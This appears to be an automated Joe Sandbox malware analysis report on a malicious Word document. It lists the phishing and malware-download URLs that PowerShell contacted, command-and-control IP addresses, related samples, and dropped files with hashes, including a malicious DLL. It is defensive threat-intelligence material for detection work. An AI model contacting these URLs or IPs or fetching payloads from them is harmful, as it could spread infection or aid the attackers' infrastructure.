http://goldcoastoffice365.com/temp/X/	100%	Avira URL Cloud	phishing
http://goldcoastoffice365.com/temp/X/P	100%	Avira URL Cloud	phishing
http://azraktours.com/wp-content/NWF9jC/	100%	Avira URL Cloud	malware
http://josegene.com/theme/gU8/	100%	Avira URL Cloud	malware
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
https://jeffdahlke.com/css/bg4n3/	100%	Avira URL Cloud	malware
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
https://167.71.148.58:443/7wfv2vt9qvzqkp6unhg/m5b2zuu1mbbc64v82d/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
paulscomputing.com	216.218.207.98	true	true	12%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://paulscomputing.com/CraigsMagicSquare/H/	true	19%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://167.71.148.58:443/7wfv2vt9qvzqkp6unhg/m5b2zuu1mbbc64v82d/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	rundll32.exe, 00000006.00000002.2099378629.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095189634.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097847364.0000000001F47000.00000002.00000001.sdmp	false		high
http://www.windows.com/pctv.	rundll32.exe, 00000009.00000002.2098388798.0000000001ED0000.00000002.00000001.sdmp	false		high
https://goldilockstraining.com/wp-includes/bftt/	powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	true	15%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://biglaughs.org/smallpotatoes/rRwRzc/	powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	true	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://investor.msn.com	rundll32.exe, 00000006.00000002.2098799816.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2094958758.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097376838.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2098388798.0000000001ED0000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	rundll32.exe, 00000006.00000002.2098799816.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2094958758.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097376838.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2098388798.0000000001ED0000.00000002.00000001.sdmp	false		high
http://www.icra.org/vocabulary/.	rundll32.exe, 00000006.00000002.2099378629.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095189634.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097847364.0000000001F47000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://paulscomputing.com	powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp	true	12%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	powershell.exe, 00000005.00000002.2093697722.00000000022F0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097391045.00000000028A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2098963794.0000000002820000.00000002.00000001.sdmp	false		high
http://investor.msn.com/	rundll32.exe, 00000006.00000002.2098799816.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2094958758.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097376838.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2098388798.0000000001ED0000.00000002.00000001.sdmp	false		high
http://goldcoastoffice365.com/temp/X/	powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	true	Avira URL Cloud: phishing	unknown
http://goldcoastoffice365.com/temp/X/P	powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp	true	Avira URL Cloud: phishing	unknown
http://azraktours.com/wp-content/NWF9jC/	powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://josegene.com/theme/gU8/	powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://www.%s.comPA	powershell.exe, 00000005.00000002.2093697722.00000000022F0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097391045.00000000028A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2098963794.0000000002820000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://jeffdahlke.com/css/bg4n3/	powershell.exe, 00000005.00000002.2094634168.0000000003072000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2097588142.0000000003BB2000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	rundll32.exe, 00000006.00000002.2099378629.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095189634.0000000001F47000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097847364.0000000001F47000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	rundll32.exe, 00000006.00000002.2098799816.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2094958758.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097376838.0000000001D60000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2098388798.0000000001ED0000.00000002.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
167.71.148.58	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
216.218.207.98	unknown	United States	36103	CENTRALUTAHUS	true
202.187.222.40	unknown	Malaysia	9930	TTNET-MYTIMEdotComBerhadMY	true
184.66.18.83	unknown	Canada	6327	SHAWCA	true

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	337532
Start date:	08.01.2021
Start time:	18:10:14
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Doc.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winDOC@30/9@1/4
EGA Information:	Successful, ratio: 50%
HDC Information:	Successful, ratio: 73.5% (good quality ratio 67.4%) Quality average: 73.4% Quality standard deviation: 30.2%
HCA Information:	Successful, ratio: 91% Number of executed functions: 102 Number of non-executed functions: 89
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Execution Graph export aborted for target powershell.exe, PID 2408 because it is empty Execution Graph export aborted for target rundll32.exe, PID 1492 because there are no executed function Execution Graph export aborted for target rundll32.exe, PID 2336 because there are no executed function Execution Graph export aborted for target rundll32.exe, PID 2824 because there are no executed function Execution Graph export aborted for target rundll32.exe, PID 3032 because there are no executed function Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
18:10:39	API Interceptor	1x Sleep call for process: msg.exe modified
18:10:39	API Interceptor	37x Sleep call for process: powershell.exe modified
18:10:44	API Interceptor	566x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
167.71.148.58	Informacion_4-09757.doc	Get hash	malicious	Browse	167.71.148.58:443/ta2men4jqfnerm/
	Info.doc	Get hash	malicious	Browse	167.71.148.58:443/6nxx5oih3i78uw7qh7/m4898/4op628cd88c/ji50i68zs1/i9hmqo/
	09922748 2020 909_3553.doc	Get hash	malicious	Browse	167.71.148.58:443/hmj5vtnwvmoed5al/v2rzu19kezl4ociy/lwcymauesm35l/scrqoykcge7ozr/lwmckdg2s4/
	info-29-122020.doc	Get hash	malicious	Browse	167.71.148.58:443/qk90ciyt532x3l/3frjvkqc2dudu/bwrw/
	79685175.doc	Get hash	malicious	Browse	167.71.148.58:443/ddfeddgtlve8/qea5xg5lugywunnrb/3fep6lwfy/5iyhveusfl/walzhzdp/
	INV750178 281220.doc	Get hash	malicious	Browse	167.71.148.58:443/n8j7z917hs/
	ARCHIVOFile-2020-IM-65448896.doc	Get hash	malicious	Browse	167.71.148.58:443/dz0y/
	MENSAJE_29_2020.doc	Get hash	malicious	Browse	167.71.148.58:443/9kb8jd09jfjjzu6p/710krlahr1w7x1ai4dw/vrx55jw5pft/29cpm1xmdw/44c4i7/
	MENSAJE_29_2020.doc	Get hash	malicious	Browse	167.71.148.58:443/9d9qfmnts3/vjvjz2rwjwd3/kruxv/r53q9e331/vmffjrhd6r8m0no7f0/
	MENSAJE.doc	Get hash	malicious	Browse	167.71.148.58:443/r8a9ihd5x7y9gubs/0w29tdx9/w9aqw0fel8ghiol/
	ARCH.doc	Get hash	malicious	Browse	167.71.148.58:443/yndmmlzko00/thlmglu2/litlfgg7al5t/7c2tfqo837z45f/
	naamloos-40727_8209243962.doc	Get hash	malicious	Browse	167.71.148.58:443/qov6j8tqrxo/qmy5tpwx15euwz50u/etk5u/er4m7h0jkgtu0lqulo/0npx0hy2i/yjsj5l2i/
	arc-20201229-07546.doc	Get hash	malicious	Browse	167.71.148.58:443/rmc2rtnzt4/fga45dyk3awr/2sr766n207t/
	FIL_49106127 528164.doc	Get hash	malicious	Browse	167.71.148.58:443/10uvse7/v0kinw131/ed37ws4ddndv1iwbh9/a3yymy4k79ii39ps/
	Adjunto_2020_UH-13478.doc	Get hash	malicious	Browse	167.71.148.58:443/495u60b7ajrab1a3v/6l2h13gy/wjaosw38b/dftbhdpoilzw3/em8pnsrzerk714/6919nubsvqxw2911/
	Dati.doc	Get hash	malicious	Browse	167.71.148.58:443/i6p9p6/
	4693747_2020_7865319.doc	Get hash	malicious	Browse	167.71.148.58:443/dd8xgec1513nstpclm7/1tb9c9bqpxml9mrid55/
	ARCH.doc	Get hash	malicious	Browse	167.71.148.58:443/1mpy4lrtxykgw5i/yn5yixx/
	LIST_20201229_1397.doc	Get hash	malicious	Browse	167.71.148.58:443/11c0whd0/
	documento 2912 2020.doc	Get hash	malicious	Browse	167.71.148.58:443/ra3q90a4b9qy3435u4/3ka3yw5o/4ihgodinbet/ffq83awdif0a69irje1/m9uclpm90mj/
216.218.207.98	Informacion_4-09757.doc	Get hash	malicious	Browse	paulscomputing.com/CraigsMagicSquare/H/
202.187.222.40	index.html.dll	Get hash	malicious	Browse	202.187.222.40/6knpolw2ea15x/wl5r20ctm3/
	Documento_2020.doc	Get hash	malicious	Browse	202.187.222.40/mwhowwqb/gks2aqnysulsbbf/v6acyr4iy3c91t/ull4jzd9gg/ejl9fk51o96izzc/
	List 2020_12_21 OZV3903.doc	Get hash	malicious	Browse	202.187.222.40/3mm3s1d7s7s4pj3/iktbo/gynznozxnj1dq7/5wici4/usvuanvlngtkv/t3gjqtewd3fpq/
	MF11374 2020.doc	Get hash	malicious	Browse	202.187.222.40/qp1n21x/dm6rx/
	SecuriteInfo.com.W97M.DownLoader.5028.13042.doc	Get hash	malicious	Browse	202.187.222.40/4q2vp2zhr/tw6gc8b11d4dlpw4o/
	INFO-22.doc	Get hash	malicious	Browse	202.187.222.40/1e56hy0va62yk/mt5n1liyo5hg/6efu94gy/rxzydao0a3bbzw/
	Documento_9276701.doc	Get hash	malicious	Browse	202.187.222.40/3u7zpjzcji/pdgc5fp1c/9tg5/
	Dati_2112_122020.doc	Get hash	malicious	Browse	202.187.222.40/7iga49cgomahelodxo/
	Informacion 122020 N-98239.doc	Get hash	malicious	Browse	202.187.222.40/xqmtay/
	as233456.doc	Get hash	malicious	Browse	202.187.222.40/n91cd/66sk22clombtb17lxc/dr4e/f27un216im1/gx8f2z/gmzqc3/
	Y0124.doc	Get hash	malicious	Browse	202.187.222.40/uoj70yal/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
paulscomputing.com	Informacion_4-09757.doc	Get hash	malicious	Browse	216.218.207.98

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DIGITALOCEAN-ASNUS	Electronic form.doc	Get hash	malicious	Browse	157.245.123.197
	______.doc	Get hash	malicious	Browse	188.166.207.182
	______.doc	Get hash	malicious	Browse	188.166.207.182
	http://landerer.wellwayssaustralia.com/r/?id=kl522318,Z185223,I521823&rd=www.electriccollisionrepair.com/236:52%20PMt75252n2021?e=#landerer@doriltoncapital.com	Get hash	malicious	Browse	5.101.110.225
	info.doc	Get hash	malicious	Browse	138.197.99.250
	JI35907_2020.doc	Get hash	malicious	Browse	178.128.68.22
	http://46.101.152.151/?email=michael.little@austalusa.com	Get hash	malicious	Browse	46.101.152.151
	http://search.hwatchtvnow.co	Get hash	malicious	Browse	82.196.7.246
	Informacion_4-09757.doc	Get hash	malicious	Browse	167.71.148.58
	Info.doc	Get hash	malicious	Browse	167.71.148.58
	Informacion_29.doc	Get hash	malicious	Browse	138.197.99.250
	https://pdfsharedmessage.xtensio.com/7wtcdlta	Get hash	malicious	Browse	134.209.238.18
	readme.doc	Get hash	malicious	Browse	159.89.126.148
	http://cvpro.info/wp-admin/fzNN04Xs2LGKNw6vR3M/	Get hash	malicious	Browse	206.189.52.133
	http://fake-cash-app-screenshot-generator.hostforjusteasy.fun	Get hash	malicious	Browse	167.71.72.151
	http://search.hwatchtvnow.co	Get hash	malicious	Browse	37.139.1.159
	DAT 2020_12_30.doc	Get hash	malicious	Browse	138.197.202.203
	http://yfnyblv.yobinsetio.site/	Get hash	malicious	Browse	165.22.207.20
	http://mainfreight-6452496282.eritro.ir/retailer.php?ikpah=Z2lvdmFuYS50YWJhcmluaUBtYWluZnJlaWdodC5jb20=	Get hash	malicious	Browse	188.166.103.55
	#Ud83d#Udcde mkoxlien@hbs.net @ 503 AM 503 AM.pff.HTM	Get hash	malicious	Browse	159.89.4.250
TTNET-MYTIMEdotComBerhadMY	Informacion_4-09757.doc	Get hash	malicious	Browse	202.187.222.40
	Info.doc	Get hash	malicious	Browse	202.187.222.40
	4693747_2020_7865319.doc	Get hash	malicious	Browse	202.187.222.40
	index.html.dll	Get hash	malicious	Browse	202.187.222.40
	Documento_2020.doc	Get hash	malicious	Browse	202.187.222.40
	List 2020_12_21 OZV3903.doc	Get hash	malicious	Browse	202.187.222.40
	MF11374 2020.doc	Get hash	malicious	Browse	202.187.222.40
	SecuriteInfo.com.W97M.DownLoader.5028.13042.doc	Get hash	malicious	Browse	202.187.222.40
	INFO-22.doc	Get hash	malicious	Browse	202.187.222.40
	Documento_9276701.doc	Get hash	malicious	Browse	202.187.222.40
	Dati_2112_122020.doc	Get hash	malicious	Browse	202.187.222.40
	Informacion 122020 N-98239.doc	Get hash	malicious	Browse	202.187.222.40
	as233456.doc	Get hash	malicious	Browse	202.187.222.40
	Y0124.doc	Get hash	malicious	Browse	202.187.222.40
	nIUMFDogK0.exe	Get hash	malicious	Browse	202.187.199.171
	Transfer invoice.vbs	Get hash	malicious	Browse	61.6.84.83
	REMITTANCE SLI.exe	Get hash	malicious	Browse	61.6.13.149
	a2.ex.exe	Get hash	malicious	Browse	202.184.167.189
	meront.exe	Get hash	malicious	Browse	61.6.30.223
	31PAYMENT ADVIC.exe	Get hash	malicious	Browse	61.6.43.245
CENTRALUTAHUS	Informacion_4-09757.doc	Get hash	malicious	Browse	216.218.207.98
CENTRALUTAHUS	PO_08312020.xls	Get hash	malicious	Browse	216.218.206.55
SHAWCA	https://1drv.ms:443/o/s!BAXL7VqGJe6lg0eKk2MZcT_c29ga?e=Qdftz9F3oESsQIuV76Ppsw&at=9	Get hash	malicious	Browse	156.11.18.134
	Informacion_4-09757.doc	Get hash	malicious	Browse	184.66.18.83
	Info.doc	Get hash	malicious	Browse	184.66.18.83
	84-2020-98-6493170.doc	Get hash	malicious	Browse	184.66.18.83
	4693747_2020_7865319.doc	Get hash	malicious	Browse	184.66.18.83
	index.html.dll	Get hash	malicious	Browse	184.66.18.83
	Documento_2020.doc	Get hash	malicious	Browse	184.66.18.83
	List 2020_12_21 OZV3903.doc	Get hash	malicious	Browse	184.66.18.83
	MF11374 2020.doc	Get hash	malicious	Browse	184.66.18.83
	SecuriteInfo.com.W97M.DownLoader.5028.13042.doc	Get hash	malicious	Browse	184.66.18.83
	INFO-22.doc	Get hash	malicious	Browse	184.66.18.83
	Documento_9276701.doc	Get hash	malicious	Browse	184.66.18.83
	Dati_2112_122020.doc	Get hash	malicious	Browse	184.66.18.83
	Informacion 122020 N-98239.doc	Get hash	malicious	Browse	184.66.18.83
	as233456.doc	Get hash	malicious	Browse	184.66.18.83
	Y0124.doc	Get hash	malicious	Browse	184.66.18.83
	Archivo-2020-98864.doc	Get hash	malicious	Browse	184.66.18.83
	file.doc	Get hash	malicious	Browse	184.66.18.83
	Inf_CHB9147.doc	Get hash	malicious	Browse	184.66.18.83
	59154-2212-122020.doc	Get hash	malicious	Browse	184.66.18.83

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll	Informacion_4-09757.doc	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{99DD3073-AAC4-4BB8-A12E-BAAB271DD5EB}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.3586208805849456
Encrypted:	false
SSDEEP:	3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbm:IiiiiiiiiifdLloZQc8++lsJe1MzN
MD5:	CF70770B18EE4D2D3584E26882E961A9
SHA1:	B674900882E193830D40625F6FB3968665CF88F5
SHA-256:	11491FBEEBBF8D1C6B421C310B38DA090923E2B20CF966E70AE7AE8B906C5833
SHA-512:	8A41B167C8EFA61C1074BD703D606FCABE90AECB07DE507846D5F2C463CF8F130364F79EB1A2C3AC4B0CD31FF1A0017E98884672E9B7688539EE868D0F4CB680
Malicious:	false
Preview:	..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D1AA7D61-551E-40AF-9919-E039C2A6E74E}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162688
Entropy (8bit):	4.254477833686909
Encrypted:	false
SSDEEP:	1536:C6gL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CRJNSc83tKBAvQVCgOtmXmLpLm4l
MD5:	CEF28C6E4F49BB0DE2976E073BAB441E
SHA1:	CA58C8432E040057B717AC133A9265853586BA0D
SHA-256:	1D4FA10D7A83016498AB2358804248BAF6817D661558040F362B1A354004C40D
SHA-512:	6AF1B9A2646A37333FA9FE17431E69F2D029D36A7ED2D6DFA7AFB6A60FAC413DCAD3D4C6ED865962B6EE508973526C091EAA5FDAC68C072BA173A4335031423F
Malicious:	false
Preview:	MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........\|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0......*..\+...+..$,...,...,..P-...-......\|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Doc.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Aug 26 14:08:14 2020, atime=Sat Jan 9 01:10:34 2021, length=206336, window=hide
Category:	dropped
Size (bytes):	1946
Entropy (8bit):	4.4936355580544145
Encrypted:	false
SSDEEP:	48:8K6/XT3IkQ5Rj2FQh2K6/XT3IkQ5Rj2FQ/:8K6/XLIkQ5UFQh2K6/XLIkQ5UFQ/
MD5:	C38445A30D6C8B15D19CCC6F96CED1AB
SHA1:	5FC35945C876F1605C2864C6BF6090D75A5DD137
SHA-256:	9C927546DD20294D9904134808A510BF562DB8FA4C29BE2C80DDE3875DEC98C5
SHA-512:	960210BF50221E28E71A83B00D1CFB02C2A95BCC7035FB5ACF3845B20D3B9D0806F72704A183CEFA3105354FDE48BFB0924E1569AAF5C73D4E3BEF479220DEA7
Malicious:	false
Preview:	L..................F.... ....TO..{...TO..{....4.,....&...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....R.2..&..)RR. .Doc.doc.<.......Q.y.Q.y...8.....................D.o.c...d.o.c.......q...............-...8...[............?J......C:\Users\..#...................\\088753\Users.user\Desktop\Doc.doc.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.o.c...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......088753..........D_....3N...W...9F.C...........[D_....3N...W...9F.C...........[....L..................F.... ..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	47
Entropy (8bit):	3.730700034382073
Encrypted:	false
SSDEEP:	3:M1cGLBC5zCmX1cGLBCv:MeG9AzWG9s
MD5:	071D4A911934095DE3D17DDC9112A372
SHA1:	5765B8D82EE7042EA3223FE74B8F7B8CE92977B0
SHA-256:	3F7D6A8692933570421B2ABAA5D00299928FFAEB27FBD44CA64901D4DD018E2F
SHA-512:	59174496AADC7D95CE7999973E9BC8977986C145650FE0767E6FDD254C0DA19360B6C5BC3D1F4ED7E3DB5D2E64C657FF681DF17C1B15D4585A18EC9F5EFB2437
Malicious:	false
Preview:	[doc]..Doc.LNK=0..Doc.LNK=0..[doc]..Doc.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
MD5:	39EB3053A717C25AF84D576F6B2EBDD2
SHA1:	F6157079187E865C1BAADCC2014EF58440D449CA
SHA-256:	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
SHA-512:	5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CNLDNGQDOXTNQW5LTFBN.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5849605943204703
Encrypted:	false
SSDEEP:	96:chQCsMqbqvsqvJCwovz8hQCsMqbqvsEHyqvJCworlzkKYkHcf8RelUVJIu:cyKovz8yyHnorlzkNf8R/Iu
MD5:	2F954C783E9CD474F876CD96D4950B3C
SHA1:	5E872158635EA3B407AEEE7CCD1701B20DBD7DC2
SHA-256:	63B0E7657CA6D348F80B4A75B33EAC54614B21FD92B963AB169297C0D39BDA4E
SHA-512:	7B5CE0E30B263A36F5DA2C936314A7CF0534FE6EEF3E6C34BC90D6B544C4482339227607BE81C4EDB9A353985792668C755893C6F765037FD4AF9CFEA348155A
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	239104
Entropy (8bit):	7.444833448975582
Encrypted:	false
SSDEEP:	3072:KC1sUJsEIoJCTFM5/A8eWLdlU8thEnYsqibnjPw+a5DIYvK8UIDoQQh3:KC1NJMoJywAkdrHEn1qibjm5DIYSX
MD5:	0BCAFFBDA4138F2EE2786CFD098C1DA9
SHA1:	3D6E52F126809C05E69F1D543B7F8D53435A8E17
SHA-256:	5E9F4504B7E0938A2B2EB9A7F090BE9F4B1101AA3BE145A3B5895CB14BACD0EF
SHA-512:	92EA1A4CDDA5A58D275C1058467C5F2DC5147A2D321A41396C6598EAF3D9520AAB114C411CDA08A7D8F3DB90E36E9D3F10720541DDF7FAA7758B9C6073CD92C2
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 90%
